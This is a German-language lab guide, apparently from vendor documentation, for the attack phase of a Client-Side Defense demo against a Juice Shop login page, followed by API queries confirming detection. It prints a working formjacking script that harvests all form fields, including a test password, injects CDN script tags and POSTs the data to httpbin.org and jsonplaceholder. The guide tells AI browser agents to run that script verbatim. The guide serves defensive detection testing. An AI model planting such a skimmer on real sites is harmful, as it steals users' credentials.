Phase 2 — Angriff

Phase 2 generiert simulierten Angriffsdatenverkehr gegen die geschützte Anwendung und bestätigt, dass CSD diesen erkannt hat. Phase 1 muss abgeschlossen sein — alle Prüfungen in Schritt 7 müssen BESTANDEN haben — bevor Sie fortfahren.

Schritt 8: Angriffssimulation

Hinweis

Dieser Schritt erfordert die Ausführung von JavaScript im Browser — curl kann keine CSD-Erkennung auslösen. KI-Assistenten mit Browser-Automatisierungswerkzeugen (MCP Chrome DevTools, Playwright, Puppeteer) führen diese Schritte direkt über die nachfolgende KI-automatisierte Ausführung aus. Operatoren ohne Browser-Automatisierung führen die manuellen Schritte durch.

Nachdem die Infrastruktur überprüft wurde (alle Prüfungen in Phase 1, Schritt 7 BESTANDEN), führen Sie die Angriffssimulationsskripte aus, um CSD-Erkennungen zu generieren. Die Skripte sind im Leitfaden zur Auslösung der Erkennung und in der Angriffsskript-Bibliothek definiert.

KI-automatisierte Ausführung

KI-Assistenten mit Browser-Automatisierungswerkzeugen führen die Angriffssimulation programmgesteuert aus:

1. Navigation mit initScript — navigieren Sie zunächst zu about:blank, um einen sauberen Dokumentkontext sicherzustellen (vermeidet veraltete initScripts aus vorherigen Navigationen), dann navigate_page zu http://$F5XC_DOMAINNAME/#/login mit einem initScript, das die nativen Funktionen setInterval, clearInterval, fetch und console.log speichert, bevor zone.js diese patcht, auf die Anmeldedatenfelder wartet, Anmeldedaten über den nativen HTMLInputElement.prototype.value-Setter befüllt und das kombinierte Erkennungsskript sofort inline ausführt. Verwenden Sie das nachfolgende initScript wörtlich.
2. Willkommensbanner schließen — press_key mit Escape, um das Willkommensbanner zu schließen. Bei nachfolgenden Besuchen erscheint das Banner möglicherweise nicht (Cookies wurden gespeichert). Der Cookie-Zustimmungsdialog wird automatisch durch die Escape-Taste geschlossen.
3. Auf Abschluss warten — warten Sie 10 Sekunden, bis alle CDN-Skript-Lade-/Fehler-Callbacks und fetch-Promise-Auflösungen abgeschlossen sind.
4. Beweise erfassen — list_console_messages prüfen auf [CSD Demo] Simulation complete und CDN-Ladeergebnisse; list_network_requests gefiltert nach script- und fetch-Typen, um HTTP-Statuscodes zu verifizieren (200/201 für Erfolg, pending für zurückgehaltene Anfragen)

Phase 2 initScript (wörtlich — genau so verwenden wie geschrieben):

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

Achtung

zone.js-Inkompatibilität — Juice Shop verwendet Angular’s zone.js, das setTimeout, setInterval, fetch, XMLHttpRequest und andere Browser-APIs patcht. Dies führt bei den MCP-Werkzeugen evaluate_script, fill und click zum Fehler Cannot read properties of undefined (reading 'call'). Verwenden Sie stattdessen navigate_page mit initScript — initScript wird ausgeführt, bevor zone.js geladen wird, sodass Sie native API-Referenzen speichern und in Polling-Callbacks verwenden können. Das initScript muss Formularfelder über den nativen HTMLInputElement.prototype.value-Setter befüllen (nicht über fill) und das Erkennungsskript inline ausführen (nicht über setTimeout, das zone.js nach dem Seitenlade möglicherweise abfängt). Weitere Details finden Sie unter Auslösung der Erkennung — KI-automatisierte Ausführung.

Hinweis

initScript-Akkumulation — jeder navigate_page-Aufruf mit einem initScript-Parameter fügt das Skript einer persistenten Liste hinzu, die bei jedem nachfolgenden Dokumentladevorgang ausgeführt wird. Um zu vermeiden, dass veraltete Skripte interferieren, navigieren Sie entweder zwischen Durchläufen zu about:blank oder verwenden Sie new_page mit isolatedContext für einen sauberen Browserkontext.

Hinweis

Speichern der nativen fetch-Referenz im initScript — das initScript speichert window.fetch.bind(window), bevor zone.js es patcht. Dies stellt sicher, dass fetch-Aufrufe korrekt ohne zone.js-Fehler Cannot read properties of undefined funktionieren. Dasselbe initScript (mit gespeicherter nativer fetch-Referenz) wird für die Angriffsdurchläufe in Phase 2 und Phase 3 verwendet — die CSD-Abwehr fängt fetch()-Aufrufe nicht ab, daher beeinflusst das Speichern der nativen Referenz das Abwehrverhalten nicht.

Achtung

Vorübergehender Ursprungsserver-404 — beim ersten Aufruf der Angular-Anwendung können polyfills.js oder andere App-Skripte einen vorübergehenden HTTP-404 vom Ursprungsserver zurückgeben. Dies verhindert den Bootstrap-Vorgang von Angular und führt zu einer leeren Seite ohne Anmeldeformular. Der 404-Fehler ist vorübergehend — nachfolgende Anfragen geben 200 oder 304 zurück. Wiederherstellung: navigieren Sie zu about:blank, warten Sie 2 Sekunden, dann wiederholen Sie die Navigation. Wenn das Problem nach mehreren Versuchen weiterhin besteht, prüfen Sie den Ursprungsserverzustand über den Load-Balancer-Pfad (curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js).

Manuelle Ausführung

Operatoren ohne Browser-Automatisierungswerkzeuge führen die Schritte manuell durch:

1. Navigieren Sie zur Anmeldeseite der geschützten Anwendung: http://xF5XC_DOMAINNAMEx/#/login
2. Testanmeldedaten eingeben — geben Sie test@example.com im E-Mail-Feld und P@ssword123 im Passwortfeld ein (das Formular nicht absenden)
3. DevTools öffnen — drücken Sie F12 und wechseln Sie zum Konsolen-Tab
4. Das kombinierte Erkennungsskript ausführen — fügen Sie das Skript aus Auslösung der Erkennung — Das kombinierte Simulationsskript ausführen in die Konsole ein und drücken Sie Enter
5. Konsolenausgabe überprüfen — bestätigen Sie, dass die phasenweise [CSD Demo]-Ausgabe folgendes zeigt: Formularfeld-Erfassung, Skriptinjektion von 4 CDN-Domänen und Datenexfiltration zu 2 Endpunkten

Was ausgelöst wird

Signal	Verhalten	Erkennung
Formularfeld-Erfassung	Liest E-Mail- und Passwort-Eingabewerte	Skripte, die sensible Formularfelder lesen — als hohes Risiko eingestuft
Skriptinjektion	Injiziert 4 <script>-Tags von cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io	Bis zu 4 neue Drittanbieter-Skriptdomänen erkannt (CDN-Verfügbarkeit variiert)
Datenexfiltration	Sendet erfasste Daten via fetch an www.httpbin.org und jsonplaceholder.typicode.com	Netzwerkaufrufe zu externen Domänen

Hinweis

CDN-Verfügbarkeit variiert. Nicht alle 4 CDN-Skripte werden bei jedem Durchlauf geladen — Browser-Ressourcenbeschränkungen, Netzwerkbedingungen oder CDN-Drosselung können dazu führen, dass einige mit ERR_INSUFFICIENT_RESOURCES oder Timeout fehlschlagen. Die Simulation ist erfolgreich, wenn mindestens ein CDN-Skript geladen wird. CSD erkennt den Injektionsversuch unabhängig davon, ob das Skript erfolgreich geladen wird — die Erstellung des <script>-Tags selbst ist das Erkennungssignal.

In schwerwiegenden Fällen kann ERR_INSUFFICIENT_RESOURCES zu einem seitenweiten Fehler eskalieren — die gesamte Seite wird leer, Screenshots laufen in ein Timeout, und take_snapshot schlägt fehl. Dies tritt typischerweise auf, wenn mehrere Navigationen mit umfangreichen initScripts im selben Browserkontext akkumulieren. Wiederherstellung: Verwenden Sie new_page mit isolatedContext, um einen neuen Browserkontext zu erstellen, und wiederholen Sie dann die Sequenz von about:blank → navigate_page mit initScript. Dies unterscheidet sich von einzelnen CDN-Skript-Fehlern, die den Simulationserfolg nicht beeinträchtigen.

Tipp

Verwenden Sie nach der Angriffssimulation diese deterministische Polling-Schleife, um auf Erkennungen zu warten:

1. Fragen Sie /detected_domains alle 60 Sekunden ab
2. Wenn DET-3 besteht (Exfil-Domänen erscheinen in /detected_domains), fahren Sie sofort mit Schritt 9 fort
3. Wenn nach 10 Abfragen (10 Minuten) noch leer, prüfen Sie den CSD-Status (Phase 1, Schritt 5) und die Registrierung der geschützten Domäne (Phase 1, Schritt 6) — eine davon ist wahrscheinlich falsch konfiguriert
4. Wenn nach 30 Abfragen (30 Minuten) noch leer, stoppen Sie und melden Sie dies dem Operator — fahren Sie nicht mit Phase 3 fort

Für zusätzliche gezielte Simulationen (einzelne Angriffskategorien, maximaler Erkennungs-Stresstest) siehe die Angriffsskript-Bibliothek.

Beweise

Der KI-Assistent sollte folgendes berichten. Bei KI-automatisierter Ausführung werden Beweise programmgesteuert über list_console_messages erfasst (die Polling-Funktion des initScripts protokolliert Ergebnisse in der Konsole). Bei manueller Ausführung liest der Operator die Konsolenausgabe des Browsers.

Prüfung	Erwartet	Status
Anmeldeseite geladen	200 OK unter http://$F5XC_DOMAINNAME/#/login	BESTANDEN / FEHLGESCHLAGEN
Konsolenskript ausgeführt	[CSD Demo] Simulation complete in der Konsolenausgabe	BESTANDEN / FEHLGESCHLAGEN
Felder erfasst	Anzahl > 0 in der Konsolenausgabe	BESTANDEN
Skripte injiziert	1–4 CDN-Domänen in der Konsolenausgabe (einige können mit Ressourcenfehlern fehlschlagen)	BESTANDEN, wenn mindestens eine CDN-Domäne erscheint
Exfiltrationskanäle	2 fetch-POST-Versuche in der Konsolenausgabe	BESTANDEN

Tipp

Wenn das HTTPS-LB-Zertifikat gültig ist (CertificateValid), können Sie die Simulation optional auch gegen https://$F5XC_DOMAINNAME/#/login ausführen. Dies ist für den Demo-Fortschritt nicht erforderlich.

Schritt 9: Erkennungsverifizierung über API

Fragen Sie die CSD-API-Endpunkte ab, um zu bestätigen, dass Erkennungen aufgezeichnet wurden. Verwenden Sie die Polling-Schleife: fragen Sie /detected_domains alle 60 Sekunden ab; fahren Sie fort, sobald DET-3 besteht. Wenn DET-3 nach 10 Minuten nicht besteht, prüfen Sie die CSD-Konfiguration. Wenn DET-3 nach 30 Minuten nicht besteht, stoppen Sie und melden Sie dies dem Operator. Diese Endpunkte sind in der API-Referenz dokumentiert und verwenden dieselbe Authentifizierung und denselben Namespace wie die vorherigen Schritte.

Hinweis

Reihenfolge der Endpunktverarbeitung: /detected_domains wird zuerst befüllt und ist der primäre Indikator dafür, dass die CSD-Pipeline funktioniert. /scripts und /formFields werden nach einem langsameren Backend-Verarbeitungsplan befüllt und können auch nach mehreren Simulationsdurchläufen bis zu 20–30 Minuten leer bleiben. Wenn /detected_domains Exfil-Domänen zeigt (www.httpbin.org, jsonplaceholder.typicode.com), gilt die Simulation als erfolgreich erkannt und Sie können fortfahren — die DET-1-Prüfung unten spiegelt dies wider.

Erkannte Skripte

Abfrage nach Skripten, die in den letzten 24 Stunden erkannt wurden:

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

Feld	Erwartet	Status
total	> 0 (Skripte erkannt)	BESTANDEN wenn > 0; AUSSTEHEND wenn 0, aber /detected_domains Exfil-Domänen zeigt
Skriptnamen	Enthält CDN-Domänen (cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io) in script_name	BESTANDEN wenn injizierte CDN-Domänen erscheinen

Erkannte Domänen

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

Feld	Erwartet	Status
total_domains	> 0	BESTANDEN wenn > 0
Domänenliste	Enthält CDN- und Exfil-Domänen	BESTANDEN wenn erwartete Domänen erscheinen

Formularfelder

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

Feld	Erwartet	Status
total	> 0	BESTANDEN wenn > 0; AUSSTEHEND wenn 0, aber DET-3 besteht
name	Enthält email, password	BESTANDEN wenn sensible Felder erscheinen
sensitivity	Sensitive für E-Mail-/Passwortfelder	BESTANDEN wenn ML korrekt klassifiziert hat

Hinweis

Die Formularfeldverarbeitung ist langsamer als die Domänenerkennung. Der /formFields-Endpunkt kann bei der ersten Abfrage Felder mit unvollständigen Metadaten zurückgeben. Die ML-Empfindlichkeitsklassifizierung (Sensitive vs. Not Sensitive) wird nach Abschluss der Backend-Verarbeitung befüllt — dies kann 20–30 Minuten nach dem ersten Simulationsdurchlauf dauern. Wenn Felder erscheinen, aber keine Klassifizierung aufweisen, fragen Sie später erneut ab. DET-3 (/detected_domains) ist das primäre Erfolgskriterium.

Phase 2 — Zusammenfassung der Beweise

Nach allen Erkennungsabfragen wird der abschließende Erkennungsstatus dargestellt:

Test-ID	Prüfung	Status
DET-1	Skripte erkannt (Endpunkt /scripts)	BESTANDEN wenn > 0; AUSSTEHEND wenn leer, aber DET-3 besteht
DET-2	CDN-Domänen erkannt	BESTANDEN / FEHLGESCHLAGEN
DET-3	Exfil-Domänen erkannt (/detected_domains)	Primärindikator — BESTANDEN wenn www.httpbin.org oder jsonplaceholder.typicode.com erscheinen
DET-4	Formularfelder erkannt (Endpunkt /formFields)	BESTANDEN wenn > 0; AUSSTEHEND wenn leer, aber DET-3 besteht

Hinweis

Mindestvoraussetzung für den Fortschritt zu Phase 3: DET-3 muss BESTANDEN haben (Exfil-Domänen in /detected_domains sichtbar). DET-1 und DET-4 können bei der ersten Verwendung oder nach einem neuen Aufbau AUSSTEHEND anzeigen — dies ist normal. Wenn DET-3 nach 30 Minuten ebenfalls FEHLGESCHLAGEN anzeigt, überprüfen Sie, ob CSD aktiviert ist (Phase 1, Schritt 5), ob die geschützte Domäne registriert ist (Phase 1, Schritt 6) und ob das CSD-JS-Tag injiziert wird (Phase 1, Schritt 7, JS-Konfigurationsprüfung).

---

Phase 2 abgeschlossen. Fahren Sie mit Phase 3 — Abwehr fort, um Abwehrregeln anzuwenden und zu überprüfen, ob Domänen blockiert werden.